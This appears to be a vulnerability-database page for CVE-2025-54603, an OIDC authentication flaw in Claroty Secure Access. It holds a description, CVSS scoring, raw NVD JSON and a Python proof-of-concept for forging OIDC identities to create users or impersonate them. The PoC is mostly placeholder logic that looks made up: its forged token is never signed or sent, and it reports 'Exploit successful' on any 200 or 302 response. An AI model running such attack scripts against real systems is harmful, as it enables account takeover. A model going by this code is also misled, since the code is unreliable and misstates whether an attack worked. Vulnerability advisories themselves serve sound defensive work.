Security Vulnerability Report
CVE-2025-54603 CVSS 6.5 MEDIUM

CVE-2025-54603

Published: 2025-10-14 17:15:44
Last Modified: 2026-04-15 00:35:42

Description

An incorrect OIDC authentication flow in Claroty Secure Access 3.3.0 through 4.0.2 can result in unauthorized user creation or impersonation of existing OIDC users.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Claroty Secure Access >= 3.3.0
Claroty Secure Access <= 4.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-54603 PoC - Claroty Secure Access OIDC Authentication Bypass
# This PoC demonstrates the OIDC authentication flow exploitation

import requests
import json
import jwt  # PyJWT library
from urllib.parse import urlencode

TARGET_URL = "https://target-claroty-instance.com"
OIDC_CALLBACK_ENDPOINT = "/auth/oidc/callback"


def generate_forged_oidc_token(target_user_email, target_user_sub):
    """
    Generate a forged OIDC ID token mimicking legitimate user attributes.
    In vulnerable versions, the server fails to properly validate token claims,
    allowing impersonation.
    """
    # In a real exploit, the attacker would need to obtain or forge
    # a valid signed token. The vulnerability lies in the server-side
    # validation logic being insufficient.
    forged_claims = {
        "iss": "https://attacker-controlled-idp.com",
        "sub": target_user_sub,
        "email": target_user_email,
        "name": "Impersonated User",
        "aud": "claroty-secure-access-client",
        "iat": 1697280000,
        "exp": 2697280000,
    }
    # Note: Actual exploitation requires either:
    # 1. A misconfigured OIDC setup where the IdP is attacker-controlled
    # 2. Ability to manipulate the OIDC callback parameters
    # 3. Exploiting the incorrect user provisioning logic
    return forged_claims


def exploit_oidc_user_creation(target_url, attacker_email):
    """
    Exploit the incorrect OIDC authentication flow to create an unauthorized
    user account in Claroty Secure Access.
    """
    session = requests.Session()
    # Step 1: Initiate OIDC authentication flow
    auth_params = {
        "response_type": "code",
        "client_id": "claroty-secure-access",
        "redirect_uri": f"{target_url}{OIDC_CALLBACK_ENDPOINT}",
        "scope": "openid email profile",
        "state": "attacker_state_token",
    }
    # Step 2: The vulnerability allows sending manipulated callback
    # with crafted parameters that bypass proper user validation
    callback_params = {
        "code": "valid_authorization_code",
        "state": "attacker_state_token",
        "id_token_hint": "forged_or_manipulated_token",
    }
    # Step 3: Send the crafted callback to create unauthorized user
    callback_url = f"{target_url}{OIDC_CALLBACK_ENDPOINT}"
    response = session.post(
        callback_url,
        data=callback_params,
        allow_redirects=False
    )
    if response.status_code in [200, 302]:
        print(f"[+] Exploit successful - User may have been created/impersonated")
        print(f"[+] Response: {response.headers.get('Location', 'N/A')}")
        return True
    else:
        print(f"[-] Exploit failed - Status: {response.status_code}")
        return False


def exploit_oidc_user_impersonation(target_url, victim_email):
    """
    Exploit the OIDC vulnerability to impersonate an existing user.
    """
    session = requests.Session()
    # Craft OIDC callback with victim's identity information
    # The server's flawed validation logic accepts this as legitimate
    impersonation_params = {
        "code": "stolen_or_manipulated_code",
        "state": "valid_state",
        "email": victim_email,
    }
    callback_url = f"{target_url}{OIDC_CALLBACK_ENDPOINT}"
    response = session.post(
        callback_url,
        data=impersonation_params,
        allow_redirects=False
    )
    if response.status_code in [200, 302]:
        print(f"[+] Impersonation of {victim_email} may be successful")
        return session
    return None


if __name__ == "__main__":
    # Example usage - for authorized testing only
    # exploit_oidc_user_creation(TARGET_URL, "[email protected]")
    # exploit_oidc_user_impersonation(TARGET_URL, "[email protected]")
    print("CVE-2025-54603 PoC - For authorized security testing only")
```

References

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-54603",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-14T17:15:44.307",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An incorrect OIDC authentication flow in Claroty Secure Access 3.3.0 through 4.0.2 can result in unauthorized user creation or impersonation of existing OIDC users."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-284"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://claroty.com",
        "source": "[email protected]"
      },
      {
        "url": "https://claroty.com/product-security/oidc-configurations-in-claroty-secure-access",
        "source": "[email protected]"
      }
    ]
  }
}
```